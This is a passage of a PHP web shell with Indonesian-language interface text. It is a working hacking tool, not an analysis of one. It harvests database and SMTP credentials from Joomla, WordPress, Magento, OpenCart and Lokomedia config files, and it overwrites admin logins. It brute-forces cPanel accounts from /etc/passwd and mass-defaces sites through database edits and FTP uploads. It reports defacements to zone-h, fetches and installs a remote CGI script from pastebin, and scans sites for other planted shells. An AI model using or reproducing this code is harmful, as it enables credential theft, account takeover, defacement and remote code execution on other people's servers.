  3058. $dbname = ambilkata($config,"db = '","'");
  3059. $dbprefix = ambilkata($config,"dbprefix = '","'");
  3060. $prefix = $dbprefix."users";
  3061. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3062. $db = mysql_select_db($dbname);
  3063. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3064. $result = mysql_fetch_array($q);
  3065. $id = $result['id'];
  3066. $site = ambilkata($config,"sitename = '","'");
  3067. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  3068. echo "Config => ".$file_conf."<br>";
  3069. echo "CMS => Joomla<br>";
  3070. if($site == '') {
  3071. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3072. } else {
  3073. echo "Sitename => $site<br>";
  3074. }
  3075. if(!$update OR !$conn OR !$db) {
  3076. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3077. } else {
  3078. echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3079. }
  3080. mysql_close($conn);
  3081. } elseif(preg_match("/WordPress/",$config)) {
  3082. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3083. $dbuser = ambilkata($config,"DB_USER', '","'");
  3084. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3085. $dbname = ambilkata($config,"DB_NAME', '","'");
  3086. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3087. $prefix = $dbprefix."users";
  3088. $option = $dbprefix."options";
  3089. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3090. $db = mysql_select_db($dbname);
  3091. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3092. $result = mysql_fetch_array($q);
  3093. $id = $result[ID];
  3094. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3095. $result2 = mysql_fetch_array($q2);
  3096. $target = $result2[option_value];
  3097. if($target == '') {
  3098. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3099. } else {
  3100. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  3101. }
  3102. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3103. echo "Config => ".$file_conf."<br>";
  3104. echo "CMS => Wordpress<br>";
  3105. echo $url_target;
  3106. if(!$update OR !$conn OR !$db) {
  3107. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3108. } else {
  3109. echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3110. }
  3111. mysql_close($conn);
  3112. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3113. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3114. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3115. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3116. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3117. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3118. $prefix = $dbprefix."admin_user";
  3119. $option = $dbprefix."core_config_data";
  3120. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3121. $db = mysql_select_db($dbname);
  3122. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3123. $result = mysql_fetch_array($q);
  3124. $id = $result[user_id];
  3125. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3126. $result2 = mysql_fetch_array($q2);
  3127. $target = $result2[value];
  3128. if($target == '') {
  3129. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3130. } else {
  3131. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3132. }
  3133. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3134. echo "Config => ".$file_conf."<br>";
  3135. echo "CMS => Magento<br>";
  3136. echo $url_target;
  3137. if(!$update OR !$conn OR !$db) {
  3138. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3139. } else {
  3140. echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3141. }
  3142. mysql_close($conn);
  3143. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3144. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3145. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3146. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3147. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3148. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3149. $prefix = $dbprefix."user";
  3150. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3151. $db = mysql_select_db($dbname);
  3152. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3153. $result = mysql_fetch_array($q);
  3154. $id = $result[user_id];
  3155. $target = ambilkata($config,"HTTP_SERVER', '","'");
  3156. if($target == '') {
  3157. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3158. } else {
  3159. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3160. }
  3161. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3162. echo "Config => ".$file_conf."<br>";
  3163. echo "CMS => OpenCart<br>";
  3164. echo $url_target;
  3165. if(!$update OR !$conn OR !$db) {
  3166. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3167. } else {
  3168. echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3169. }
  3170. mysql_close($conn);
  3171. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3172. $dbhost = ambilkata($config,'server = "','"');
  3173. $dbuser = ambilkata($config,'username = "','"');
  3174. $dbpass = ambilkata($config,'password = "','"');
  3175. $dbname = ambilkata($config,'database = "','"');
  3176. $prefix = "users";
  3177. $option = "identitas";
  3178. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3179. $db = mysql_select_db($dbname);
  3180. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3181. $result = mysql_fetch_array($q);
  3182. $target = $result[alamat_website];
  3183. if($target == '') {
  3184. $target2 = $result[url];
  3185. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3186. if($target2 == '') {
  3187. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3188. } else {
  3189. $cek_login3 = file_get_contents("$target2/adminweb/");
  3190. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3191. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3192. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3193. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3194. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3195. } else {
  3196. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3197. }
  3198. }
  3199. } else {
  3200. $cek_login = file_get_contents("$target/adminweb/");
  3201. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3202. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3203. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3204. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3205. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3206. } else {
  3207. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3208. }
  3209. }
  3210. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3211. echo "Config => ".$file_conf."<br>";
  3212. echo "CMS => Lokomedia<br>";
  3213. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3214. echo $url_target2;
  3215. } else {
  3216. echo $url_target;
  3217. }
  3218. if(!$update OR !$conn OR !$db) {
  3219. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3220. } else {
  3221. echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3222. }
  3223. mysql_close($conn);
  3224. }
  3225. }
  3226. }
  3227. } else {
  3228. echo "<center>
  3229. <h1>Auto Edit User Config</h1>
  3230. <form method='post'>
  3231. DIR Config: <br>
  3232. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3233. Set User & Pass: <br>
  3234. <input type='text' name='user_baru' value='maling' placeholder='user_baru'><br>
  3235. <input type='text' name='pass_baru' value='maling27' placeholder='pass_baru'><br>
  3236. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3237. </form>
  3238. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3239. ";
  3240. }
  3241. }elseif($_GET['do'] == 'shelscan') {
  3242. echo'<center><h2>Shell Finder</h2>
  3243. <form action="" method="post">
  3244. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3245. <br>
  3246. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  3247. </form><br>';
  3248. if (isset($_POST["scan"])) {
  3249. $url = $_POST['traget'];
  3250. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3251. echo "Result :<br />";
  3252. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3253. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3254. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3255. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3256. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3257. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3258. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3259. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3260. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3261. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3262. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3263. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3264. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3265. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3266. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3267. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3268. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3269. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3270. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3271. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3272. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3273. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3274. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3275. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3276. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","Vlyn.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3277. foreach ($shells as $shell){
  3278. $headers = get_headers("$url$shell"); //
  3279. if (eregi('200', $headers[0])) {
  3280. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  3281. $dz = fopen('shells.txt', 'a+');
  3282. $suck = "$url$shell";
  3283. fwrite($dz, $suck."\n");
  3284. }
  3285. }
  3286. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3287. }
  3288.  
  3289. }
  3290. elseif($_GET['do'] == 'cpanel') {
  3291. if($_POST['crack']) {
  3292. $usercp = explode("\r\n", $_POST['user_cp']);
  3293. $passcp = explode("\r\n", $_POST['pass_cp']);
  3294. $i = 0;
  3295. foreach($usercp as $ucp) {
  3296. foreach($passcp as $pcp) {
  3297. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3298. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3299. } else {
  3300. $_SESSION[$ucp] = "1";
  3301. $_SESSION[$pcp] = "1";
  3302. $i++;
  3303. echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
  3304. }
  3305. }
  3306. }
  3307. }
  3308. if($i == 0) {
  3309. } else {
  3310. echo "<br>Nemu ".$i." Cpanel by <font color=blue>JanVlyn</font>";
  3311. }
  3312. } else {
  3313. echo "<center>
  3314. <form method='post'>
  3315. USER: <br>
  3316. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3317. $_usercp = fopen("/etc/passwd","r");
  3318. while($getu = fgets($_usercp)) {
  3319. if($getu == '' || !$_usercp) {
  3320. echo "<font color=red>Can't read /etc/passwd</font>";
  3321. } else {
  3322. preg_match_all("/(.*?):x:/", $getu, $u);
  3323. foreach($u[1] as $user_cp) {
  3324. if(is_dir("/home/$user_cp/public_html")) {
  3325. echo "$user_cp\n";
  3326. }
  3327. }
  3328. }
  3329. }
  3330. echo "</textarea><br>
  3331. PASS: <br>
  3332. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3333. function cp_pass($dir) {
  3334. $pass = "";
  3335. $dira = scandir($dir);
  3336. foreach($dira as $dirb) {
  3337. if(!is_file("$dir/$dirb")) continue;
  3338. $ambil = file_get_contents("$dir/$dirb");
  3339. if(preg_match("/WordPress/", $ambil)) {
  3340. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3341. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3342. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3343. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3344. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3345. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3346. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3347. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3348. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3349. } elseif(preg_match("/client/", $ambil)) {
  3350. preg_match("/password=(.*)/", $ambil, $pass1);
  3351. if(preg_match('/"/', $pass1[1])) {
  3352. $pass1[1] = str_replace('"', "", $pass1[1]);
  3353. $pass .= $pass1[1]."\n";
  3354. }
  3355. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3356. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3357. }
  3358. }
  3359. echo $pass;
  3360. }
  3361. $cp_pass = cp_pass($dir);
  3362. echo $cp_pass;
  3363. echo "</textarea><br>
  3364. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3365. </form>
  3366. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3367. }
  3368. } elseif($_GET['do'] == 'smtp') {
  3369. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3370. function scj($dir) {
  3371. $dira = scandir($dir);
  3372. foreach($dira as $dirb) {
  3373. if(!is_file("$dir/$dirb")) continue;
  3374. $ambil = file_get_contents("$dir/$dirb");
  3375. $ambil = str_replace("$", "", $ambil);
  3376. if(preg_match("/JConfig|joomla/", $ambil)) {
  3377. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3378. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3379. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3380. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3381. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3382. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3383. echo "SMTP Host: <font color=blue>$smtp_host</font><br>";
  3384. echo "SMTP port: <font color=blue>$smtp_port</font><br>";
  3385. echo "SMTP user: <font color=blue>$smtp_user</font><br>";
  3386. echo "SMTP pass: <font color=blue>$smtp_pass</font><br>";
  3387. echo "SMTP auth: <font color=blue>$smtp_auth</font><br>";
  3388. echo "SMTP secure: <font color=blue>$smtp_secure</font><br><br>";
  3389. }
  3390. }
  3391. }
  3392. $smpt_hunter = scj($dir);
  3393. echo $smpt_hunter;
  3394. } elseif($_GET['do'] == 'auto_wp') {
  3395. if($_POST['hajar']) {
  3396. $title = htmlspecialchars($_POST['new_title']);
  3397. $pn_title = str_replace(" ", "-", $title);
  3398. if($_POST['cek_edit'] == "Y") {
  3399. $script = $_POST['edit_content'];
  3400. } else {
  3401. $script = $title;
  3402. }
  3403. $conf = $_POST['config_dir'];
  3404. $scan_conf = scandir($conf);
  3405. foreach($scan_conf as $file_conf) {
  3406. if(!is_file("$conf/$file_conf")) continue;
  3407. $config = file_get_contents("$conf/$file_conf");
  3408. if(preg_match("/WordPress/", $config)) {
  3409. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3410. $dbuser = ambilkata($config,"DB_USER', '","'");
  3411. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3412. $dbname = ambilkata($config,"DB_NAME', '","'");
  3413. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3414. $prefix = $dbprefix."posts";
  3415. $option = $dbprefix."options";
  3416. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3417. $db = mysql_select_db($dbname);
  3418. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3419. $result = mysql_fetch_array($q);
  3420. $id = $result[ID];
  3421. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3422. $result2 = mysql_fetch_array($q2);
  3423. $target = $result2[option_value];
  3424. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3425. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3426. echo "<div style='margin: 5px auto;'>";
  3427. if($target == '') {
  3428. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3429. } else {
  3430. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3431. }
  3432. if(!$update OR !$conn OR !$db) {
  3433. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3434. } else {
  3435. echo "<font color=blue>sukses di ganti.</font><br>";
  3436. }
  3437. echo "</div>";
  3438. mysql_close($conn);
  3439. }
  3440. }
  3441. } else {
  3442. echo "<center>
  3443. <h1>Auto Edit Title+Content WordPress</h1>
  3444. <form method='post'>
  3445. DIR Config: <br>
  3446. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3447. Set Title: <br>
  3448. <input type='text' name='new_title' value='Hacked By Vlyn' placeholder='New Title'><br><br>
  3449. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3450. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3451. <textarea name='edit_content' placeholder='Example : http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3452. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3453. </form>
  3454. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3455. ";
  3456. }
  3457. } elseif($_GET['do'] == 'zoneh') {
  3458. if($_POST['submit']) {
  3459. $domain = explode("\r\n", $_POST['url']);
  3460. $nick = $_POST['nick'];
  3461. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3462. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3463. function zoneh($url,$nick) {
  3464. $ch = curl_init("http://www.zone-h.com/notify/single");
  3465. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3466. curl_setopt($ch, CURLOPT_POST, true);
  3467. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3468. return curl_exec($ch);
  3469. curl_close($ch);
  3470. }
  3471. foreach($domain as $url) {
  3472. $zoneh = zoneh($url,$nick);
  3473. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3474. echo "$url -> <font color=blue>OK</font><br>";
  3475. } else {
  3476. echo "$url -> <font color=red>ERROR</font><br>";
  3477. }
  3478. }
  3479. } else {
  3480. echo "<center><form method='post'>
  3481. <u>Defacer</u>: <br>
  3482. <input type='text' name='nick' size='50' value='Trenggalek Cyber Army'><br>
  3483. <u>Domains</u>: <br>
  3484. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3485. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3486. </form>";
  3487. }
  3488. echo "</center>";
  3489. }elseif($_GET['do'] == 'cpftp_auto') {
  3490. if($_POST['crack']) {
  3491. $usercp = explode("\r\n", $_POST['user_cp']);
  3492. $passcp = explode("\r\n", $_POST['pass_cp']);
  3493. $i = 0;
  3494. foreach($usercp as $ucp) {
  3495. foreach($passcp as $pcp) {
  3496. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3497. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3498. } else {
  3499. $_SESSION[$ucp] = "1";
  3500. $_SESSION[$pcp] = "1";
  3501. if($ucp == '' || $pcp == '') {
  3502. //
  3503. } else {
  3504. echo "[+] username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
  3505. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3506. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3507. if((!$ftp_login) || (!$ftp_conn)) {
  3508. echo "[+] <font color=red>Login Gagal</font><br><br>";
  3509. } else {
  3510. echo "[+] <font color=blue>Login Sukses</font><br>";
  3511. $fi = htmlspecialchars($_POST['file_deface']);
  3512. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3513. if($deface) {
  3514. $i++;
  3515. echo "[+] <font color=blue>Deface Sukses</font><br>";
  3516. if(function_exists('posix_getpwuid')) {
  3517. $domain_cp = file_get_contents("/etc/named.conf");
  3518. if($domain_cp == '') {
  3519. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3520. } else {
  3521. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3522. foreach($domains_cp[1] as $dj) {
  3523. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3524. $user_cp_url = $user_cp_url['name'];
  3525. if($user_cp_url == $ucp) {
  3526. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3527. break;
  3528. }
  3529. }
  3530. }
  3531. } else {
  3532. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3533. }
  3534. } else {
  3535. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3536. }
  3537. }
  3538. //echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
  3539. }
  3540. }
  3541. }
  3542. }
  3543. }
  3544. if($i == 0) {
  3545. } else {
  3546. echo "<br>Sukses Deface ".$i." Cpanel by <font color=blue>JanVlyn.</font>";
  3547. }
  3548. } else {
  3549. echo "<center>
  3550. <form method='post'>
  3551. Filename: <br>
  3552. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3553. Deface Page: <br>
  3554. <input type='text' name='deface' placeholder='http://www.site.com/yourdefacepagge.php' style='width: 450px;'><br>
  3555. USER: <br>
  3556. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3557. $_usercp = fopen("/etc/passwd","r");
  3558. while($getu = fgets($_usercp)) {
  3559. if($getu == '' || !$_usercp) {
  3560. echo "<font color=red>Can't read /etc/passwd</font>";
  3561. } else {
  3562. preg_match_all("/(.*?):x:/", $getu, $u);
  3563. foreach($u[1] as $user_cp) {
  3564. if(is_dir("/home/$user_cp/public_html")) {
  3565. echo "$user_cp\n";
  3566. }
  3567. }
  3568. }
  3569. }
  3570. echo "</textarea><br>
  3571. PASS: <br>
  3572. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3573. function cp_pass($dir) {
  3574. $pass = "";
  3575. $dira = scandir($dir);
  3576. foreach($dira as $dirb) {
  3577. if(!is_file("$dir/$dirb")) continue;
  3578. $ambil = file_get_contents("$dir/$dirb");
  3579. if(preg_match("/WordPress/", $ambil)) {
  3580. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3581. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3582. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3583. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3584. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3585. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3586. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3587. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3588. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3589. } elseif(preg_match("/client/", $ambil)) {
  3590. preg_match("/password=(.*)/", $ambil, $pass1);
  3591. if(preg_match('/"/', $pass1[1])) {
  3592. $pass1[1] = str_replace('"', "", $pass1[1]);
  3593. $pass .= $pass1[1]."\n";
  3594. }
  3595. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3596. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3597. }
  3598. }
  3599. echo $pass;
  3600. }
  3601. $cp_pass = cp_pass($dir);
  3602. echo $cp_pass;
  3603. echo "</textarea><br>
  3604. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3605. </form>
  3606. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3607. }
  3608. }
  3609. elseif($_GET['do'] == 'cgi') {
  3610. $cgi_dir = mkdir('Vlyn_cgi', 0755);
  3611. $file_cgi = "Vlyn_cgi/cgi.izo";
  3612. $isi_htcgi = "AddHandler cgi-script .izo";
  3613. $htcgi = fopen(".htaccess", "w");
  3614. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3615. $cgi = fopen($file_cgi, "w");
  3616. fwrite($cgi, $cgi_script);
  3617. fwrite($htcgi, $isi_htcgi);
  3618. chmod($file_cgi, 0755);
  3619. echo "<iframe src='Vlyn_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3620. } elseif($_GET['do'] == 'fake_root') {
  3621. ob_start();
  3622. function reverse($url) {
  3623. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3624. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3625. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  3626. curl_setopt($ch, CURLOPT_HEADER, 0);
